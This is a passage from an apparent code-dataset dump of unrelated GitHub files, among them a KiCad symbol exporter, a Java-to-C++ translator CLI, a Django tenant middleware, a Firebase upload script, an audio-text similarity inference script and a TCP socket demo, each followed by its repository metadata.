ee_polylines=ee_polygons, ee_bbox=ee_bbox, kicad_version=kicad_version\n )\n\n\ndef convert_ee_paths(\n ee_paths: List[EeSymbolPath], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> Tuple[List[KiSymbolPolygon], List[KiSymbolPolygon]]:\n kicad_polygons = []\n kicad_beziers = []\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n for ee_path in ee_paths:\n raw_pts = ee_path.paths.split(\" \")\n\n x_points = []\n y_points = []\n\n # Small svg path parser : doc -> https://www.w3.org/TR/SVG11/paths.html#PathElement\n\n for i in range(len(raw_pts)):\n if raw_pts[i] in [\"M\", \"L\"]:\n x_points.append(to_ki(int(float(raw_pts[i + 1])) - int(ee_bbox.x)))\n y_points.append(-to_ki(int(float(raw_pts[i + 2])) - int(ee_bbox.y)))\n i += 2\n elif raw_pts[i] == \"Z\":\n x_points.append(x_points[0])\n y_points.append(y_points[0])\n elif raw_pts[i] == \"C\":\n ...\n # TODO : Add bezier support\n\n # if ee_path.fill_color:\n # x_points.append(x_points[0])\n # y_points.append(y_points[0])\n\n ki_polygon = KiSymbolPolygon(\n points=[\n [x_points[i], y_points[i]]\n for i in range(min(len(x_points), len(y_points)))\n ],\n points_number=min(len(x_points), len(y_points)),\n is_closed=x_points[0] == x_points[-1] and y_points[0] == y_points[-1],\n )\n\n kicad_polygons.append(ki_polygon)\n\n return kicad_polygons, kicad_beziers\n\n\ndef convert_to_kicad(ee_symbol: EeSymbol, kicad_version: KicadVersion) -> KiSymbol:\n\n ki_info = KiSymbolInfo(\n name=ee_symbol.info.name,\n prefix=ee_symbol.info.prefix.replace(\"?\", \"\"),\n package=ee_symbol.info.package,\n manufacturer=ee_symbol.info.manufacturer,\n datasheet=ee_symbol.info.datasheet,\n lcsc_id=ee_symbol.info.lcsc_id,\n jlc_id=ee_symbol.info.jlc_id,\n )\n\n kicad_symbol = KiSymbol(\n info=ki_info,\n pins=convert_ee_pins(\n ee_pins=ee_symbol.pins, ee_bbox=ee_symbol.bbox, 
kicad_version=kicad_version\n ),\n rectangles=convert_ee_rectangles(\n ee_rectangles=ee_symbol.rectangles,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n ),\n circles=convert_ee_circles(\n ee_circles=ee_symbol.circles,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n ),\n arcs=convert_ee_arcs(\n ee_arcs=ee_symbol.arcs, ee_bbox=ee_symbol.bbox, kicad_version=kicad_version\n ),\n )\n kicad_symbol.circles += convert_ee_ellipses(\n ee_ellipses=ee_symbol.ellipses,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n\n kicad_symbol.polygons, kicad_symbol.beziers = convert_ee_paths(\n ee_paths=ee_symbol.paths, ee_bbox=ee_symbol.bbox, kicad_version=kicad_version\n )\n kicad_symbol.polygons += convert_ee_polylines(\n ee_polylines=ee_symbol.polylines,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n kicad_symbol.polygons += convert_ee_polygons(\n ee_polygons=ee_symbol.polygons,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n\n return kicad_symbol\n\n\ndef tune_footprint_ref_path(ki_symbol: KiSymbol, footprint_lib_name: str):\n ki_symbol.info.package = f\"{footprint_lib_name}:{ki_symbol.info.package}\"\n\n\nclass ExporterSymbolKicad:\n def __init__(self, symbol, kicad_version: KicadVersion):\n self.input: EeSymbol = symbol\n self.version = kicad_version\n self.output = (\n convert_to_kicad(ee_symbol=self.input, kicad_version=kicad_version)\n if isinstance(self.input, EeSymbol)\n else logging.error(\"Unknown input symbol format\")\n )\n\n def export(self, footprint_lib_name: str) -> str:\n\n tune_footprint_ref_path(\n ki_symbol=self.output,\n footprint_lib_name=footprint_lib_name,\n )\n return self.output.export(kicad_version=self.version)\n","repo_name":"uPesy/easyeda2kicad.py","sub_path":"easyeda2kicad/kicad/export_kicad_symbol.py","file_name":"export_kicad_symbol.py","file_ext":"py","file_size_in_byte":12792,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"53"} +{"seq_id":"7490887322","text":"import argparse\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom translator import Translator\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Java to C++ Translator')\n parser.add_argument('file', metavar='file', type=str, help='path to java source code file')\n parser.add_argument('--cpp', default='a.cpp', type=str, help='path to output c++ code file')\n parser.add_argument('--force', help='force writing to existing file', action='store_true')\n parser.add_argument('--debug', help='debug', action='store_true')\n parser.add_argument('--compile', help='compile code with g++ compiler', action='store_true')\n parser.add_argument('--compilepath', default='a.exe', type=str, help='path to compiled c++ code file')\n\n args = parser.parse_args()\n java_file_name = args.file\n cpp_file_name = args.cpp\n force = args.force\n debug = args.debug\n compiled_file_name = args.compilepath\n compile = args.compile or (args.compilepath is not None)\n\n if not os.path.isfile(java_file_name):\n raise Exception(f'Cannot find file by that path: {java_file_name}.')\n if (not force) and (os.path.isdir(cpp_file_name) or os.path.isfile(cpp_file_name)):\n raise Exception(f'There is a file/directory by that path provided in --cpp: {cpp_file_name}. '\n 'Please select another path.')\n if compile and ((not force) and (os.path.isdir(compiled_file_name) or os.path.isfile(compiled_file_name))):\n raise Exception(f'There is a file/directory by that path provided in --compilepath: {compiled_file_name}. 
'\n 'Please select another path.')\n\n # DEBUG\n # folder = 'tests\\\\correct_tests\\\\function'\n # java_file_name = os.path.join(folder, 'Main.java')\n # cpp_file_name = os.path.join(folder, 'main.cpp')\n # compiled_file_name = os.path.join(folder, 'main.exe')\n\n with open(java_file_name, 'r') as java_file:\n with open(cpp_file_name, 'w') as cpp_file:\n translator = Translator(os.path.dirname(Path(java_file_name)), debug)\n cpp_source_code = translator.run(java_file.read())\n cpp_file.write(str(cpp_source_code))\n print(f'Success. Output saved to {cpp_file_name}.')\n\n if compile:\n command_to_compile = f'g++ {cpp_file_name} -o {compiled_file_name}'\n sp = subprocess.run(command_to_compile, shell=False)\n if sp.returncode == 0:\n print(f'Success. Binary saved to {compiled_file_name}.')\n else:\n raise Exception(f'g++ return code {sp.returncode}. ')\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n # print(e, file=sys.stderr)\n raise\n\n","repo_name":"ephemeralsadness/translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73261928809","text":"from collections import Counter\r\nfrom tika import parser\r\nimport pandas as pd\r\n\r\nexcluir = ['de','o','por','não','um','a','para','isso','é','mais','foram','vem','como',\r\n 'na','que','no','e','os','as','com','do','da','das','dos','uma','em','entanto','aumenta',\r\n 'maior','entre','ainda','já','temos','maio','são','Administração', 'BNY', 'Mellon', 'Serviços', 'Financeiros', 'DTVM', 'S/A',\r\n 'CNPJ:', '02.201.501/0001-61', 'Av.', 'Presidente', 'Wilson,', '231,', '11º', 'andar', 'Rio', 'de', 'Janeiro', '–', 'RJ', 'CEP:',\r\n '20030-905', 'Telefone', '(21)', '3219-2500', 'Fax', '(21)', '3219-2508', 'www.bnymellon.com.br/sf', 'SAC:', 'Fale', 'conosco', 'no', 'endereço',\r\n 'www.bnymellon.com.br/sf', 'ou', 'no', 'telefone', '0800', '7253219', 'Ouvidoria', 'no', 'endereço',\r\n 'www.bnymellon.com.br/sf', 'ou', 'no', 'telefone:', '0800', '7253219', 'Este', 'material', 'é', 'meramente',\r\n 'informativo', 'e', 'não', 'considera', 'os', 'objetivos', 'de', 'investimento,', 'a', 'situ-', 'ação', 'financeira',\r\n 'ou', 'as', 'necessidades', 'individuais', 'de', 'um', 'ou', 'de', 'determinado', 'grupo', 'de', 'investidores.',\r\n 'Recomendamos', 'a', 'consulta', 'de', 'profissionais', 'espe-', 'cializados', 'para', 'decisão', 'de', 'investimentos.',\r\n 'Fundos', 'de', 'Investimento', 'não', 'contam', 'com', 'a', 'Garantia','/','caps', 'do', 'Administrador,', 'do', 'Gestor,', 'de',\r\n 'qualquer','bahia', 'mecanis-', 'mo', 'de', 'seguro,', 'ou,', 'ainda,', 'do', 'Fundo', 'Garantidor', 'de', 'Crédito', '–', 'FGC.',\r\n 'Rentabilidade', 'obtida','20','am', 'no', 'passado', '2020','não', 'representa', 'garantia', 'de', 'rentabilidade', 'futura.', 'Ao', 'investidor',\r\n 'é', 'recomendada', 'a', 'leitura', 'cuidado-', 'sa', 'do', 'prospecto', 'ou', 'do', 'regulamento', 'do', 'Fundo', 'de', 'Investimento',\r\n 'antes', 'de', 'aplicar','fic','am', 'seus', 'recursos.', 'As', 'rentabilidade', 'divulgadas', 'são', 'líquidas', 'de', 'taxa', 'de', 'administração',\r\n 'e', 'performance', 'e', 'bruta', 'de', 'impos-', 'tos.', 'As', 'informações', 'e', 'conclusões', 'contidas', 'neste', 'material', 'podem',\r\n 'ser', 'alteradas', 'a', 'qualquer', 'tempo,', 'sem', 'que', 'seja', 'necessária', 'prévia', 'comunicação.', 'Este', 'material', 'não', 'pode',\r\n 'ser', 'copiado,', 'reproduzi-', 
'do', 'ou', 'distribuído', 'sem', 'a', 'prévia', 'e', 'expressa', 'con-', 'cordância', 'da', 'JGP.', 'Para', 'maiores', 'informações,',\r\n 'consulte', 'nossa', 'área', 'comercial.', 'Gestão', 'e', 'Distribuição', 'JGP', 'Gestão', 'de', 'Recursos', 'Ltda.', 'e', 'JGP', 'Gestão',\r\n 'de', 'Crédito', 'Ltda.', 'Rua', 'Humaitá', '275,', '11º', 'andar', 'Humaitá,', 'Rio', 'de', 'Janeiro', '-', 'RJ', 'CEP:', '22261-005',\r\n 'Brasil', 'www.jgp.com.br', 'https://www.jgp.com.br/?utm_source=report&utm_medium=pdf&utm_campaign=relatorio_gestao&utm_content=abr21', 'Relatório',\r\n 'de', 'Gestão:', 'Carta', 'Macroeconômica', '—', 'Junho', '2021', '1', 'Relatório', 'de', 'Gestão', 'Carta', 'Macroeconômica',\r\n 'Junho', '2021', 'Material', 'de', 'Divulgação', 'https://www.instagram.com/jgp.asset', 'https://www.linkedin.com/company/jgp',\r\n 'http://youtube.co/jgpgestao', 'Relatório', 'de', 'Gestão:', 'Carta', 'Macroeconômica', '—', 'Junho', '2021', '2', 'Process',\r\n 'finished','foi','janeiro', 'br/sf','with','nível','mas','gestão','está','junho','julho', 'exit','março','tudo','essa','tem','bnymellon',\r\n '|','essa','este','onde', 'code','pois','gestão:', '0','sobre','se','relatório','https://www','muito','ano','carta','fevereiro','www','abril','nos','também','ao','jgp',\r\n 'de', 'a', 'o', 'que', 'e', 'do', 'da', 'em', 'um', 'para', 'é', 'com', 'não', 'uma', 'os', 'no', 'se', 'na', 'por', 'mais', 'as', 'dos', 'como', 'mas', 'foi', 'ao',\r\n 'ele', 'das', 'tem', 'à', 'seu', 'sua', 'ou', 'ser', 'quando', 'muito', 'há', 'nos', 'já', 'está', 'eu', 'também', 'só', 'pelo', 'pela', 'até', 'isso', 'ela', 'entre',\r\n 'era', 'depois', 'sem', 'mesmo', 'aos', 'ter', 'seus', 'quem', 'nas', 'me', 'esse', 'eles', 'estão', 'você', 'tinha', 'foram', 'essa', 'num', 'nem', 'suas', 'meu', 'às',\r\n 'minha', 'têm', 'numa', 'pelos', 'elas', 'havia', 'seja', 'qual', 'será', 'nós', 'tenho', 'lhe', 'deles', 'essas', 'esses', 'pelas', 'este', 'fosse', 'dele', 'tu', 'te',\r\n 'vocês', 'vos', 'lhes', 'meus', 'minhas', 'teu', 'tua', 'teus', 'tuas', 'nosso', 'nossa', 'nossos', 'nossas', 'dela', 'delas', 'esta', 'estes', 'estas', 'aquele', 'aquela',\r\n 'aqueles', 'aquelas', 'isto', 'aquilo', 'estou', 'está', 'estamos', 'estão', 'estive', 'esteve', 'estivemos', 'estiveram', 'estava', 'estávamos', 'estavam', 'estivera',\r\n 'estivéramos', 'esteja', 'estejamos', 'estejam', 'estivesse', 'estivéssemos', 'estivessem', 'estiver', 'estivermos', 'estiverem', 'hei', 'há', 'havemos', 'hão',\r\n 'houve', 'houvemos', 'houveram', 'houvera', 'houvéramos', 'haja', 'hajamos', 'hajam', 'houvesse', 'houvéssemos', 'houvessem', 'houver', 'houvermos', 'houverem',\r\n 'houverei', 'houverá', 'houveremos', 'houverão', 'houveria', 'houveríamos', 'houveriam', 'sou', 'somos', 'são', 'era', 'éramos', 'eram', 'fui', 'foi', 'fomos',\r\n 'foram', 'fora', 'fôramos', 'seja', 'sejamos', 'sejam', 'fosse', 'fôssemos', 'fossem', 'for', 'formos', 'forem', 'serei', 'será', 'seremos', 'serão', 'seria',\r\n 'seríamos', 'seriam', 'tenho', 'tem', 'temos', 'tém', 'tinha', 'tínhamos', 'tinham', 'tive', 'teve', 'tivemos', 'tiveram', 'tivera', 'tivéramos', 'tenha', 'tenhamos',\r\n 'tenham', 'sendo','novos','fim','novos','meses','fundos','02%','07%','r','início','ab','alguns','21','long','quanto','tivesse','3','data','fundo','25%','9','8','7','6','5','4','2','1', 'tivéssemos','fi', 'tivessem','ativos','novas', 'tiver', 'mês','tivermos', 'pl','tiverem','fia', 'terei', 'terá', 'teremos', 'terão', 'teria', 'teríamos', 'teriam']\r\n\r\n\r\n\r\njgp = 'C:\\\\Users\\\\André 
Greboge\\\\PycharmProjects\\\\SuperRankFIDCS\\\\carta\\\\'\r\n\r\ngestores = []\r\n\r\n\r\nfor gestor in gestores:\r\n cols = ['','','','','','','','','','']\r\n comum = []\r\n pdfs = ['0121','0221','0321','0421','0521','0621','0721']\r\n for pdf in pdfs:\r\n # comum = []\r\n pdf_ler = parser.from_file(gestor + pdf + '.pdf')\r\n pdf_lido = pdf_ler['content']\r\n for char in '-.,\\n':\r\n pdf_lido=pdf_lido.replace(char,' ')\r\n pdf_lido = pdf_lido.lower()\r\n lista_palavras_desordenada = [s.lower() for s in pdf_lido.split() if s.lower() not in excluir]\r\n mais_comum = Counter(lista_palavras_desordenada).most_common(10)\r\n comum.append(mais_comum)\r\n tabela = pd.DataFrame(comum, columns=cols)\r\n print(comum)\r\n tabela.to_excel('tabela.xlsx')\r\n\r\n\r\n\r\n","repo_name":"andreluizgreboge/carta_gestor","sub_path":"CartaGestor.py","file_name":"CartaGestor.py","file_ext":"py","file_size_in_byte":7054,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17711077052","text":"\nfrom apps.shared_apps.customers.models import Client, Domain\nfrom channels.db import database_sync_to_async\nfrom django.conf import settings\nfrom django.db import connection\nfrom django.urls import set_urlconf\n\n\nclass AsyncTenantMainMiddleware:\n \"\"\"\n This middleware should be placed at the very top of the middleware stack.\n Selects the proper database schema using the request host. Can fail in\n various ways which is better than corrupting or revealing data.\n \"\"\"\n\n def __init__(self, app):\n # Store the ASGI application we were passed\n self.app = app\n \n @database_sync_to_async\n def get_tenant(self, domain_model, hostname):\n domain = domain_model.objects.select_related('tenant').get(domain=hostname)\n return domain.tenant\n\n async def __call__(self, scope, receive, send):\n connection.set_schema_to_public()\n\n try:\n hostname = await self.hostname_from_request(scope)\n except Exception:\n from django.http import HttpResponseNotFound\n return HttpResponseNotFound()\n \n domain_model = Domain\n\n try:\n tenant = await self.get_tenant(domain_model, hostname)\n \n except domain_model.DoesNotExist:\n raise Exception(f\"No tenant for hostname {hostname}\")\n except Exception:\n raise Exception(f\"No tenant for hostname {hostname}\")\n \n tenant.domain_url = hostname\n scope['tenant'] = tenant\n connection.set_tenant(tenant)\n\n return await self.app(scope, receive, send)\n\n async def hostname_from_request(self, scope):\n headers_dict = scope\n headers = dict(headers_dict['headers'])\n host = headers.get(b'host', b'').decode().split(':')[0]\n return host\n","repo_name":"Ngahu/dj_channels_x_dj_tenants","sub_path":"dj_channels_x_dj_tenants/middleware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23374853223","text":"import xml.etree.cElementTree as ET\nfrom datetime import datetime, timedelta\nimport random\n\n\n# \"%Y-%m-%dT%H:%M:%S.0%fZ\"\nt = timedelta(minutes=60)\ndate_only = datetime.now().date()\ndate_only.strftime(\"%Y-%m-%d\")\ntime_only = datetime.now().time()\ntime_only.strftime(\"H:%M:%S.0%fZ\")\nutc_time = str(date_only)+'T'+str(time_only) + 'Z'\ndate_list = []\ndate_list.append(utc_time)\n\nfor i in range(300):\n\n time_obj = datetime.strptime(date_list[-1], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n time = time_obj + t\n time_date_only = time.date()\n time_date_only.strftime(\"%Y-%m-%d\")\n time_time_only = 
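# [Editor's aside -- hedged sketch] The manual date + 'T' + time + 'Z'
# concatenation in xml_gen above is fragile; datetime can emit the same
# UTC-style stamp that the script later parses with "%Y-%m-%dT%H:%M:%S.%fZ"
# in one call:
#   from datetime import datetime
#   stamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%fZ")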
time.time()\n time_time_only.strftime(\"H:%M:%S.0%fZ\")\n final_time = str(time_date_only)+'T'+str(time_time_only) + 'Z'\n date_list.append(final_time)\n # print(type(final_time))\n\n root = ET.Element(\"ALPINE_MEASUREMENT\")\n site = ET.Element(\"Site\", name=\"ALPINE_KASTORIA\")\n node = ET.Element(\"NODE\", address=\"0013A20040A56FE9\")\n register = ET.Element(\"REGISTER\")\n\n site = ET.SubElement(root, \"SITE\", name=\"ALPINE_KASTORIA\")\n node = ET.SubElement(site, \"NODE\", address=\"0013A20040A56FE9\")\n register = ET.SubElement(node, \"REGISTER\")\n id = ET.SubElement(register, \"ID\", reg=\"10\")\n\n ET.SubElement(id, \"TYPE\").text = \"Distance_Sensor\"\n ET.SubElement(id, \"UNIT\").text = \"CM\"\n ET.SubElement(id, \"NAME\").text = \"Alpine_K81_Height\"\n ET.SubElement(id, \"VALUE\").text = str(random.uniform(100, 350))\n ET.SubElement(id, \"VARIABLETYPE\").text = \"xs:double\"\n ET.SubElement(id, \"TIME\").text = final_time\n\n tree = ET.ElementTree(root)\n tree.write(\"filename %s.xml\" % i)\n","repo_name":"theokont/Data-Visualization-App","sub_path":"random_xmls/xml_gen.py","file_name":"xml_gen.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36225308713","text":"import logging\nimport sys\nimport quests.wishing_well as wishing_well\n\nif __name__ == \"__main__\":\n log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'\n\n logger = logging.getLogger(\"DFK-wishing well quest\")\n logger.setLevel(logging.DEBUG)\n logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)\n\n rpc_server = 'https://api.harmony.one'\n logger.info(\"Using RPC server \" + rpc_server)\n\n level = wishing_well.quest_level(rpc_server)\n logger.info(\"Quest level \"+str(level))\n\n hero_id = 1 # \n stamina = wishing_well.get_current_stamina(hero_id, rpc_server)\n logger.info(\"Current stamina on hero \" + str(hero_id) + \": \" + str(stamina))\n\n #w3 = Web3(Web3.HTTPProvider(rpc_server))\n #gas_price_gwei = 10\n #private_key = # set private key\n #account_address = w3.eth.account.from_key(private_key).address\n #wishing_well.start_quest(hero_id, 5, private_key, w3.eth.get_transaction_count(account_address), gas_price_gwei, 30, rpc_server, logger)\n #time.sleep(60)\n #tx_receipt = wishing_well.complete_quest(hero_id, private_key, w3.eth.get_transaction_count(account_address), gas_price_gwei, 30, rpc_server, logger)\n\n #quest_result = wishing_well.parse_complete_quest_receipt(tx_receipt, rpc_server)\n #logger.info(\"Quest earned \" + str(quest_result['tear']) + \" tears and \" + str(quest_result['xp']) + \" xp\")\n\n\n\n","repo_name":"0rtis/dfktools","sub_path":"src/dfktools/wishing_well_quest_example.py","file_name":"wishing_well_quest_example.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"35227337543","text":"from cascade.utils import SterileParams, gen_filename, config, bhist\nfrom cascade.cross_section_test import get_total_flux as get_xs\nfrom cascade.nus_utils import get_flavor, get_neut, get_curr\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\n\nimport pickle\n\nfrom math import pi\n\ndef _load_flux(name):\n f = open(name,'rb')\n all_data = pickle.load(f)\n f.close()\n\n e_reco = all_data[\"e_true\"]\n a_reco = all_data[\"a_true\"]\n flux = all_data[\"flux\"]\n\n return(e_reco, a_reco, flux)\n\ne_reco, 
a_reco, flux = _load_flux(gen_filename(config[\"datapath\"], config[\"nu_flux_downsize\"]+\".dat\", SterileParams()))\n\nenergies = bhist([e_reco]).centers\na_widths = bhist([a_reco]).widths\nangles = bhist([a_reco]).centers\n\nkeys = list(flux.keys())\n\n\ndef is_track(key):\n\n curr = key.split(\"_\")[2].lower()\n if \"nc\"==curr:\n return(False)\n elif \"cc\"==curr:\n flavor = key.split(\"_\")[0].lower()\n if flavor==\"mu\":\n return(True)\n elif flavor==\"e\":\n return(False)\n elif flavor==\"tau\":\n return(False)\n else:\n raise ValueError(\"Not sure what to do with {}\".format(flavor))\n\n else:\n raise ValueError(\"Not sure what {} is\".format(curr))\n \ncascade_rate = np.zeros(shape=np.shape(flux[keys[0]])[0])\ntrack_rate = np.zeros(shape=np.shape(flux[keys[0]])[0])\n\n\neff_width = (max(a_reco)-min(a_reco))/(2*len(a_reco))\nwidths_rad = [abs(np.arccos(ang+eff_width)-np.arccos(ang-eff_width)) for ang in np.linspace(min(a_reco), max(a_reco),len(a_reco))]\n\nsterr = widths_rad*np.sin(np.arccos(a_reco))*2*pi\n\nfor key in keys:\n flav = get_flavor(key)\n neut = get_neut(key)\n curr = get_curr(key)\n\n for i_energy in range(len(energies)):\n xs = get_xs(energies[i_energy], flav, neut, curr)\n amount = sum(flux[key][i_energy]*sterr*xs)\n\n if is_track(key):\n track_rate[i_energy] += amount\n else:\n cascade_rate[i_energy] += amount\n\nfor i_energy in range(len(energies)):\n flav = get_flavor(\"Mu_nu_CC\")\n curr = get_curr(\"Mu_nu_CC\")\n\n neut_nu = get_neut(\"Mu_nu_CC\")\n neut_nubar = get_neut(\"Mu_nuBar_CC\")\n\n xs_nu = get_xs(energies[i_energy], flav, neut_nu, curr)\n xs_nubar = get_xs(energies[i_energy], flav, neut_nubar, curr)\n\n amount_nu = sum(flux[\"Mu_nu_NC\"][i_energy]*sterr*xs_nu)\n amount_nubar=sum(flux[\"Mu_nuBar_NC\"][i_energy]*sterr*xs_nubar)\n\n track_rate[i_energy]+= amount_nu+amount_nubar\n\nvolume = (1e3)**3\nnucleon_density = 0.9168*pow(100,3)*(6.02e23)\n\nplt.plot(e_reco/(1e9), track_rate*volume*nucleon_density, label=\"Track Rate\")\nplt.plot(e_reco/(1e9), cascade_rate*volume*nucleon_density, label=\"Cascade Rate\")\nplt.xscale('log')\nplt.xlabel(\"Energy [GeV]\", size=16)\nplt.ylabel(r\"Event Rate [GeV s]$^{-1}$\",size=16)\nplt.yscale('log')\nplt.xlim([10**2, 10**6])\nplt.legend()\nplt.tight_layout()\nplt.show()\n","repo_name":"BenSmithers/Cascade-Smearing","sub_path":"plotting/improve_cascade.py","file_name":"improve_cascade.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25270786685","text":"from firebase_admin import credentials, initialize_app, storage\nimport os\n\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n# Init firebase with your credentials\n\ncred = credentials.Certificate(os.path.join(current_dir, \"secret.json\"))\ninitialize_app(cred, {'storageBucket': 'bucket-url'})\n\n# Put your local file path \n\nfileName = os.path.join(current_dir, \"image.jpeg\")\nbucket = storage.bucket()\nblob = bucket.blob(fileName)\nblob.upload_from_filename(fileName)\n\n# Opt : if you want to make public access from the URL\n\nblob.make_public()\n\nprint(\"your file url\", blob.public_url)\n\n","repo_name":"MuokaPWambua/fire-storage","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70340858410","text":"import math\n\nclass Figure:\n def __init__(self, length, width):\n self.length = length\n self.width = 
width\n    def area(self): # I didn't fully understand the task; it seemed these methods were needed in every class, even the parent\n        area = self.width * self.length\n        return f'Your figure area is: {area}'\n\n    def perimeter(self): # I didn't fully understand the task; it seemed these methods were needed in every class, even the parent\n        perimeter = (self.width + self.length) * 2\n        return f'Your figure perimeter is {perimeter}'\nclass Rectangle(Figure):\n\n    def calculate_area(self):\n        area = self.width * self.length\n        return f'Your Rectangle area is: {area}'\n    def calculate_perimeter(self):\n        perimeter = (self.width + self.length) * 2\n        return f'Your Rectangle perimeter is {perimeter}'\nclass RightTriangle(Figure):\n\n    def calculate_s(self):\n        s = int(self.width * self.length / 2)\n        return f'Your Triangle area is {s}'\n\n    def calculate_p(self):\n        c = math.sqrt(self.length **2 + self.width **2)\n        p = int(self.length + self.width + c)\n        return f'Your Triangle perimeter is {p}'\n\nfig1 = Figure(4, 2)\nrectangle = Rectangle(5, 10)\ntriangle = RightTriangle(3, 4)\n\nprint(\"Rectangle Information:\")\nprint(rectangle.area())\nprint(rectangle.perimeter())\nprint(rectangle.calculate_area())\nprint(rectangle.calculate_perimeter())\nprint(\"Right Triangle Information:\")\nprint(triangle.calculate_p())\nprint(triangle.calculate_s())\n","repo_name":"m0v1e/Kontrolinis-2023-06-09","sub_path":"Uzduotis Nr.2 OOP#2.py","file_name":"Uzduotis Nr.2 OOP#2.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72270720807","text":"import argparse\nfrom pathlib import Path\n\nimport librosa\nfrom zsvision.zs_utils import load_json_config\nimport numpy as np\nimport torch\nfrom transformers import AutoTokenizer\n\nimport utils\n\n\ndef load_model(config, ckpt_path, device):\n    model = utils.init_obj_from_str(config)\n    checkpoint = torch.load(ckpt_path, map_location=\"cpu\")\n    model.load_state_dict(checkpoint[\"state_dict\"])\n    model = model.to(device)\n    model.eval()\n    return model\n\n\ndef encode_audio(model, audio, device, sample_rate=32000):\n    target_sr = model.audio_encoder.sample_rate\n    if isinstance(audio, str) and Path(audio).exists():\n        waveform = librosa.core.load(audio, sr=target_sr)[0]\n    elif isinstance(audio, (np.ndarray, torch.Tensor)):\n        if isinstance(audio, torch.Tensor):\n            audio = audio.numpy()\n        waveform = librosa.core.resample(audio, sample_rate, target_sr)\n    waveform = torch.as_tensor(waveform).to(device)\n    audio_emb = model.encode_audio(**{\n        \"waveform\": waveform.unsqueeze(0),\n        \"wave_length\": torch.tensor([len(waveform)]),\n    }).cpu().numpy()\n    return audio_emb\n\n\ndef encode_text(model, text_tokenizer, text, device, max_length):\n    if isinstance(text, str):\n        text = [text]\n    token = dict(text_tokenizer(\n        text,\n        padding=\"max_length\",\n        max_length=max_length,\n        truncation=True, return_tensors=\"pt\")\n    )\n    for k, v in token.items():\n        token[k] = v.to(device)\n    text_emb = model.encode_text(**token)\n    text_emb = text_emb.cpu().numpy()\n    return text_emb\n\n\ndef load_blat(ckpt_dir, device):\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    ckpt_dir = Path(ckpt_dir)\n    config = load_json_config(ckpt_dir / \"config.json\")\n\n    model = load_model(config[\"model\"], ckpt_dir / \"model.pth\", device)\n\n    text_tokenizer = AutoTokenizer.from_pretrained(config[\"text_tokenizer\"][\"type\"])\n    max_length = config[\"text_tokenizer\"][\"max_length\"]\n    return model, text_tokenizer, max_length\n\n\ndef infer_sim(args):\n    device = 
torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model, text_tokenizer, max_length = load_blat(args.ckpt_dir, device)\n \n with torch.no_grad():\n audio_emb = encode_audio(model, args.audio, device)\n text_emb = encode_text(model, text_tokenizer, args.text, device, max_length)\n\n at_sim = np.matmul(audio_emb, text_emb.T)\n\n print(f\"audio: {args.audio}\")\n for text, sim in zip(args.text, at_sim[0]):\n print(f\"text: {text}, similarity: {sim:.3f}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ckpt_dir\", type=str, required=True)\n parser.add_argument(\"--audio\", type=str, default=\"\")\n parser.add_argument(\"--text\", type=str, nargs=\"+\", default=[\"\"])\n\n args = parser.parse_args()\n infer_sim(args)\n","repo_name":"wsntxxn/BLAT","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2207590173","text":"import socket\nimport time\n\n# 1 买手机\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n# 2 插手机卡\nserver.bind(('127.0.0.1', 9094)) # bind传入的是一个元祖\n\n# 3 开机\nserver.listen(5) # 代表最大挂起的链接数\n\nconn, addr = server.accept()\n\nres1 = conn.recv(1)\nprint('第一次', res1)\n\ntime.sleep(6)\nres2 = conn.recv(1024)\nprint('第二次', res2)\n","repo_name":"heartangle/python","sub_path":"python_deep_learn/05 粘包现象分析/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28301523667","text":"#!/usr/bin/env python\n\nimport rospy\nimport message_filters\nfrom barbot.msg import Location, 